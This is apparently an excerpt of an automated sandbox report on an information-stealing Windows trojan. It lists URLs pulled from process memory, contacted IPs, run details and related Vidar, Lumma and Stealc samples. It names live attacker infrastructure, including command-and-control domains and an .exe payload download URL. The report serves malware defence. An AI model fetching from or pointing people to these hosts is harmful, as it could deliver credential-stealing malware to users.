                                                                                                    http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://advocachark.store/RiMSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://advocachark.store/api;MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://49.12.197.976561199780418869[1].htm.4.drfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=eMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://cowod.hopto.MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://cowod.hoptoGCAEBAKMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://cowod.hoptoMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://s.ytimg.com;MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://steam.tv/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://playd.healthnlife.pk/ldms/a43486128347.exejMSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://t.me/ae5edfile.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.drfalse
                                                                                                                                		unknown
                                                                                                                                https://store.steMSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://mozilla.org0/MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lDBKKFC.4.drfalse
                                                                                                                                      		unknown
                                                                                                                                      http://cowod.hoptoAAKJDAKMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://store.steampowered.com/points/shop/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HCAEHD.4.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://advocachark.store:443/apiMSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.ecosia.org/newtab/HCAEHD.4.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            • URL Reputation: malware
                                                                                                                                            		unknown
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDBKKFC.4.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.youtube.com/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.4.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://49.12.197.9ECAAFHMSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://steamcommunity.com/profiles/76561199780418869fMSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://www.google.com/recaptcha/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://checkout.steampowered.com/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgMSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://cowod.hopto.orgDAAEC--tent-Disposition:MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://store.steampowered.com/about/76561199780418869[1].htm.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://advocachark.store/1$~MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://help.steampowered.com/en/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://steamcommunity.com/market/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://store.steampowered.com/news/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://community.akamai.steamstatic.com/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HCAEHD.4.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://steambroadcast.akamaized.nMSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiBAECFC.4.drfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://49.12.197.9/vcruntime140.dllUMSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown

                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                            Public IPs

                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            49.12.197.9
                                                                                                                                                                            		unknownGermany
                                                                                                                                                                            		24940HETZNER-ASDEtrue
                                                                                                                                                                            104.102.49.254
                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                            		16625AKAMAI-ASUStrue
                                                                                                                                                                            147.45.44.104
                                                                                                                                                                            		playd.healthnlife.pkRussian Federation
                                                                                                                                                                            		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                            172.67.166.76
                                                                                                                                                                            		advocachark.storeUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                            45.132.206.251
                                                                                                                                                                            		cowod.hopto.orgRussian Federation
                                                                                                                                                                            		59731LIFELINK-ASRUtrue

                                                                                                                                                                            General Information

                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1524997
                                                                                                                                                                            Start date and time:2024-10-03 15:13:09 +02:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 7m 53s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Number of analysed new started processes analysed:23
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@22/32@14/5
                                                                                                                                                                            EGA Information:
                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 94%
                                                                                                                                                                            • Number of executed functions: 93
                                                                                                                                                                            • Number of non-executed functions: 259
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                            Warnings

                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.31.73, 40.126.31.67, 20.190.159.2, 20.190.159.68, 20.190.159.75, 20.190.159.64, 20.190.159.71, 20.190.159.23, 199.232.210.172, 20.189.173.22, 4.245.163.56, 40.69.42.241, 192.229.221.95, 172.202.163.200, 20.12.23.50, 20.189.173.20
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: file.exe

                                                                                                                                                                            Simulations

                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            09:14:13API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                            09:14:41API Interceptor3x Sleep call for process: MSBuild.exe modified

                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                            IPs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            49.12.197.9file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                147.45.44.104file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • playd.healthnlife.pk/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/bc2d30140aff.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/a43486128347.exe
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 147.45.44.104/ldms/a43486128347.exe

                                                                                                                                                                                                Domains

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                cowod.hopto.orgfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
                                                                                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                • 45.132.206.251
